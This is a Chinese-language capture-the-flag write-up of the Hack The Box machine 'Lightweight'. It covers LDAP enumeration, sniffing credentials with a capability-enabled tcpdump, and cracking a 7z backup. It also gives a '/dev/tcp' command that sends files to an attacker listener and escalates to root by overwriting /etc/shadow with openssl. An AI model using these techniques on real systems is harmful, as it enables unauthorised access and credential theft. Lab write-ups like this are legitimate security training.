HTB靶场(十五 Lightweight)

0x00:靶机介绍

这次的靶机是Lightweight,实打实的中等级别。后期提权属实折磨。

0x01:信息收集

还是python autorecon起手,跑完以后开了22，80，389端口。一开始看到389人傻了LDAP是什么鬼。

0x02:收集80端口信息

还是先访问80端口可以正常访问，有3个不同的子页面。

Info页面表示有WAF会BAN IP，gobuster表示扫不出来。

Status页面表示数据会每分钟刷新。

User页面表示可以让你SSH登录账号密码都是我的IP地址。但这可是中等级别的靶机肯定有一堆坑等着我。

0x03:利用nmap脚本收集LDAP端口信息

回到389端口,这里在网上找了找有个ldap* and not brute的nmap脚本可以收集相关信息。

用起来也不错可以找到相关账号ldapuser1 ldapuser2和两个密码

然而还是太年轻了。保存下密码以后让john跑跑了4个半小时也跑不出来。。。。。

0x04:登录22端口挖掘信息

这里没得办法只能去22端口登陆了。

转了一圈也没挖到啥信息，大部分目录也进不去。。。。

没办法只能传个LinEnum到靶机上看看有没有特权程序给我们运行运行。

0x05:利用LinEnum提权辅助挖掘特权程序

这里在运行./LinEnum.sh 居然发现tcpdump也在capabilities里面。

这里用网上大佬一句话概括Linux capability就是这个程序可以让普通用户也可以做只有超级用户才能做的事。这里一开始我是直接想gtfobin一步到位变成root结果不太行。

还是继续分析下tcpdump所具有的两个能力cap_net_admin和cap_net_raw+ep

这里可以在kali下直接mancapability或者是在网上找找

总结一下cap_net_admin=执行各种与网络相关的操作+更改接口(interface)配置,管理IP防火墙等,修改路由表

Cap_net_raw=可以使用RAW和PACKET的socket +可以绑定任何端口作为proxy监听/抓取数据包最后面的+ep代表effective and permit概况就是tcpdump有特权

此为菜鸡英语翻译+总结如果觉得我不对请不要太介意。。。。。。。

0x06:利用tcpdump抓取数据包

既然知道tcpdump有点小特权那我们可以用ssh登录然后启动tcpdump监听

-I any=监听所有端口的数据

-U=数据包输出

-w -xxx=过滤条件

然后我们需要回到80端口随便点点页面和功能点产生点数据wireshark打开数据包发现抓到ldap端口有个uid=ldapuser2还有一串字符串盲猜跟密码有关

Su切换我的超人，成功拿到flag。

0x07:利用john破解7z密码

这里拿到flag以后同目录下还有一个backup.7z,那我们肯定要传到本地好好关照一波。然而scp, python挂掉只能用nc传。首先在kali本地起动一个端口>文件名。

然后在靶机上执行cap 文件名 >/dev/tcp/ip/端口就可了。

当然必有密码。不过在john目录下有个7z2john.pl是专门针对7z压缩包的。当然此方法也可作用在有密码的压缩包上。

直接运行的话是不可能的还得用apt安装一个模块。

最后启动脚本导入然后再搭配字典可以跑出密码为delete。

里面有4个PHP文件最后在status.php里面有账号密码。可以su成功

0x08:提权

这里刚学了linux capability,再用一次发现openssl居然有ep权限。当然此ep非彼+ep。+ep是代表某个功能而直接=ep是代表所有特权都可运行。

而openssl提权的方法可以是自己先利用openssl生成一个密码然后再生成新的shadow把新密码替换掉root密码来达到提权效果。这里可以看到直接运行cat /etc/shadow不可。Openssl运行可。

使用openssl passwd -1 生成一个新的盐密码。这里我设置的好像是123456还是12345

然后放到新建的shadow文件上。

再次利用wget把文件接收过来以后用特权程序openssl替换掉旧的/etc/shadow密码本。最后切换root成功。

本文始发于微信公众号（疯猫网络）：HTB靶场(十五 Lightweight)